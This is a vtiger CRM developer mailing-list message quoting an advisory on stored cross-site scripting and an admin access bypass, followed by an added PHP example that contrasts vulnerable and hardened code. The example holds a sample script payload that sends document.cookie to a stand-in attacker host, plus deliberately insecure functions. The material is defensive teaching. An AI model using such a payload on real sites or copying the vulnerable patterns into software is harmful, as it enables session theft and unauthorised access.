
List:       vtigercrm-developers
Subject:    [Vtigercrm-developers] New Vulnerability in vtiger CRM 4.2.4 ->
From:       kim () haverblad ! se (Kim Haverblad)
Date:       2006-09-28 17:14:12
Message-ID: 451C02E4.8030507 () haverblad ! se

Just wondering, but what is the status of this vulnerability?

/Kim

Kim Haverblad wrote:
> A new vulnerability has been posted by Ivan Markovic regarding Cross Site
> Scripting, Security Bypass and Remote Command Execution.
> 
> Original advisory:
> http://www.security-net.biz/adv/D3906a.txt
> 
> Secunia advisory:
> http://secunia.com/advisories/21728/
> 
> Description:
> Ivan Markovic has discovered some vulnerabilities in vtiger CRM, which
> can be exploited by malicious people to conduct script insertion attacks
> and bypass certain security restrictions.
> 
> 1) Input passed to the "description" field in various modules when e.g.
> creating a contact and the "solution" field when an administrator
> modifies the solution in the HelpDesk modules isn't properly sanitised
> before being used. This can be exploited to inject arbitrary HTML and
> script code, which will be executed in a user's browser session in
> context of an affected site when the malicious user data is viewed.
> 
> 2) An error in the access control verification can be exploited by a
> normal user to access administrative modules (e.g. the settings section)
> by accessing certain URLs directly.
> 
> The vulnerabilities have been confirmed in version 4.2.4. Other versions
> may also be affected.
> 
> Solution:
> Edit the source code to ensure that input is properly sanitised and that
> access to administrative modules is properly checked.
> 
> Use another product.

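The two items in the quoted advisory are generic PHP web-application defects: a stored field echoed into a page without output encoding, and an administrative module that is only "protected" by not being linked from the menu. The following is an added example written for this archive page; it is not vtiger CRM code and does not reproduce its internals. The function names, the ADMIN_MODULES list and the sample description payload are all constructed for illustration. It shows the vulnerable shape of each pattern next to a hardened form and runs under the PHP CLI.

```php
<?php
// Added example, not code from vtiger CRM or the advisory. Hypothetical
// dispatcher and rendering helpers that mirror the two advisory items.

// --- 1) Script insertion via a stored "description"/"solution" field -------

// Vulnerable: the stored value is interpolated into the page verbatim, so
// any HTML or <script> a user saved runs in the viewer's browser.
function renderDescriptionVulnerable(string $stored): string {
    return "<div class=\"description\">{$stored}</div>";
}

// Hardened: encode for an HTML text context at output time. ENT_QUOTES also
// encodes single quotes (safe inside single-quoted attributes); the explicit
// UTF-8 argument keeps the encoder from guessing the charset.
function renderDescriptionSafe(string $stored): string {
    $encoded = htmlspecialchars($stored, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class=\"description\">{$encoded}</div>";
}

// --- 2) Direct-URL access to administrative modules -------------------------

// Hypothetical list of modules that only administrators may open. The
// advisory's bypass is requesting such a module's URL directly.
const ADMIN_MODULES = ['Settings', 'Users'];

// Vulnerable: no role check in the dispatcher; hiding the menu link is the
// only barrier, and the URL is trivially guessable or bookmarkable.
function dispatchVulnerable(string $module, array $user): string {
    return "served {$module}";
}

// Hardened: the check lives at the entry point every request passes through,
// so it cannot be skipped by typing the URL. A real handler would also send
// a 403 status before returning.
function dispatchSafe(string $module, array $user): string {
    if (in_array($module, ADMIN_MODULES, true) && empty($user['is_admin'])) {
        return "denied {$module}";
    }
    return "served {$module}";
}

// Constructed sample input: what a malicious contact description might hold.
$payload = "Meeting notes<script>document.location="
         . "'http://attacker.example/?c='+document.cookie</script>";
$normalUser = ['name' => 'alice', 'is_admin' => false];

echo renderDescriptionVulnerable($payload), PHP_EOL;   // script tag survives
echo renderDescriptionSafe($payload), PHP_EOL;         // &lt;script&gt;... is inert
echo dispatchVulnerable('Settings', $normalUser), PHP_EOL;
echo dispatchSafe('Settings', $normalUser), PHP_EOL;
```

Run it with `php example.php`. The point of the second half is where the check sits: a role test inside the shared dispatcher covers every module URL, whereas a check only in the menu-rendering code leaves the module reachable by anyone who knows or guesses its URL, which is exactly the bypass the advisory describes.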